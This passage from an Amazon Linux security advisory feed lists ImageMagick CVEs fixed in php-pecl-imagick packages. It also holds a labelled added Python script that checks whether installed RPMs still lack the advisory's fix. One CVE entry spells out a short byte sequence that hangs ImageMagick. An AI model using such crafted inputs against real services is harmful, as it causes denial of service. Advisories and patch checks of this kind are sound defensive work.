type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" 
title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pecl-imagick" version="3.4.4" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-imagick-3.4.4-2.11.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-imagick-debuginfo" version="3.4.4" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-imagick-debuginfo-3.4.4-2.11.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-imagick-debuginfo" version="3.4.4" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-imagick-debuginfo-3.4.4-2.11.amzn1.i686.rpm</filename></package><package name="php54-pecl-imagick" version="3.4.4" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-imagick-3.4.4-2.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1811</id><title>Amazon Linux AMI 
2014.03 - ALAS-2023-1811: medium priority package update for php56-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code on the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders/xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
In ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
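Added example (not code from the Amazon Linux feed or the ImageMagick project): a Python check that reads the pkglist of an advisory in this updateinfo.xml format and reports whether an installed php55-pecl-imagick or php56-pecl-imagick build is older than the fixed one. It compares epoch, version and release with RPM's rpmvercmp rules, the same ordering yum applies when it decides an advisory is still unapplied, and the ordering behind wording such as "before 7.0.8-54" in the descriptions above. The advisory tree is a constructed stand-in built with the ElementTree API, using the id and field names that appear in this file; the installed inventory, its release 2.15.amzn1 and the unrelated package are assumptions. The same check applies to both advisories in this file.

```python
import re
import xml.etree.ElementTree as ET

# Splits an RPM version or release string into the segments rpmvercmp compares:
# runs of digits, runs of letters, and the special "~" and "^" separators.
_SEGMENT = re.compile(r"(\d+|[A-Za-z]+|~|\^)")


def rpmvercmp(a: str, b: str) -> int:
    """Compare two version/release strings with RPM's rpmvercmp rules.

    Returns 1 if a is newer, -1 if a is older, 0 if they compare equal.
    Numeric segments compare numerically (so 7.0.8-54 is newer than 7.0.8-9),
    a numeric segment beats an alphabetic one, "~" sorts before anything
    (1.0~rc1 is older than 1.0), and the string with segments left over wins.
    """
    if a == b:
        return 0
    seg_a, seg_b = _SEGMENT.findall(a), _SEGMENT.findall(b)
    i = 0
    while True:
        ta = seg_a[i] if len(seg_a) > i else None
        tb = seg_b[i] if len(seg_b) > i else None
        if ta is None and tb is None:
            return 0
        if ta == "~" or tb == "~":          # tilde: older than even end-of-string
            if ta != "~":
                return 1
            if tb != "~":
                return -1
        elif ta == "^" or tb == "^":        # caret: newer than end-of-string only
            if ta is None:
                return -1
            if tb is None:
                return 1
            if ta != "^":
                return 1
            if tb != "^":
                return -1
        elif ta is None:
            return -1
        elif tb is None:
            return 1
        else:
            a_num, b_num = ta.isdigit(), tb.isdigit()
            if a_num != b_num:
                return 1 if a_num else -1   # numeric beats alphabetic
            if a_num:
                na, nb = int(ta), int(tb)
                if na != nb:
                    return 1 if na > nb else -1
            elif ta != tb:
                return 1 if ta > tb else -1
        i += 1


def evr_cmp(installed: tuple, advisory: tuple) -> int:
    """Compare (epoch, version, release) tuples, most significant field first."""
    for x, y in zip(installed, advisory):
        result = rpmvercmp(x, y)
        if result != 0:
            return result
    return 0


def parse_rpm_inventory(text: str) -> list:
    r"""Parse lines of the form name|epoch|version|release|arch, i.e. the output of
    rpm -qa --qf '%{NAME}|%{EPOCH}|%{VERSION}|%{RELEASE}|%{ARCH}\n'.
    rpm prints "(none)" for an unset epoch, which RPM treats as epoch 0."""
    pkgs = []
    for line in text.strip().splitlines():
        name, epoch, version, release, arch = line.split("|")
        if epoch == "(none)":
            epoch = "0"
        pkgs.append({"name": name, "epoch": epoch, "version": version,
                     "release": release, "arch": arch})
    return pkgs


def unpatched_advisories(updates_root, installed: list) -> dict:
    """Map advisory id to the CVE ids it fixes, for every advisory whose pkglist
    carries a newer EVR than an installed package of the same name and arch.
    Packages the host does not have installed are ignored, as yum would."""
    by_name_arch = {(p["name"], p["arch"]): p for p in installed}
    findings = {}
    for update in updates_root.findall("update"):
        adv_id = update.findtext("id")
        cves = sorted(ref.get("id") for ref in update.iter("reference")
                      if ref.get("type") == "cve")
        for pkg in update.iter("package"):
            have = by_name_arch.get((pkg.get("name"), pkg.get("arch")))
            if have is None:
                continue
            want = (pkg.get("epoch", "0"), pkg.get("version"), pkg.get("release"))
            if evr_cmp((have["epoch"], have["version"], have["release"]), want) == -1:
                findings[adv_id] = cves
    return findings


def build_sample_updateinfo():
    """Constructed stand-in for the updateinfo.xml tree, built with the ElementTree
    API so it can be handed to unpatched_advisories() exactly as
    ET.parse(path).getroot() would be. Only three of the advisory's CVEs are listed,
    and the fixed EVR 3.4.4-2.16.amzn1 is assumed for php55-pecl-imagick."""
    root = ET.Element("updates")
    update = ET.SubElement(root, "update", status="final", type="security")
    ET.SubElement(update, "id").text = "ALAS-2023-1812"
    ET.SubElement(update, "severity").text = "medium"
    refs = ET.SubElement(update, "references")
    for cve in ("CVE-2019-9956", "CVE-2019-17540", "CVE-2019-13304"):
        ET.SubElement(refs, "reference", id=cve, type="cve",
                      href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + cve)
    collection = ET.SubElement(ET.SubElement(update, "pkglist"), "collection",
                               short="amazon-linux-ami")
    for arch in ("x86_64", "i686"):
        ET.SubElement(collection, "package", name="php55-pecl-imagick",
                      version="3.4.4", release="2.16.amzn1", epoch="0", arch=arch)
    return root


# Constructed inventory (assumed values): a host still on the previous build,
# plus an unrelated package that no advisory in the sample tree mentions.
SAMPLE_INVENTORY = """\
php55-pecl-imagick|(none)|3.4.4|2.15.amzn1|x86_64
example-unrelated|(none)|1.0|1.amzn1|x86_64
"""


def check_sample() -> dict:
    return unpatched_advisories(build_sample_updateinfo(),
                                parse_rpm_inventory(SAMPLE_INVENTORY))


if __name__ == "__main__":
    for adv, cves in check_sample().items():
        print(adv, "not applied; fixes", ", ".join(cves))
```

On a real host, replace the sample tree with ET.parse() of the cached updateinfo.xml and the sample inventory with the rpm -qa query from the docstring; the epoch must be carried through because a package with epoch 1 (mod_ssl in this feed, for instance) is newer than any epoch-0 build regardless of version.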
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" 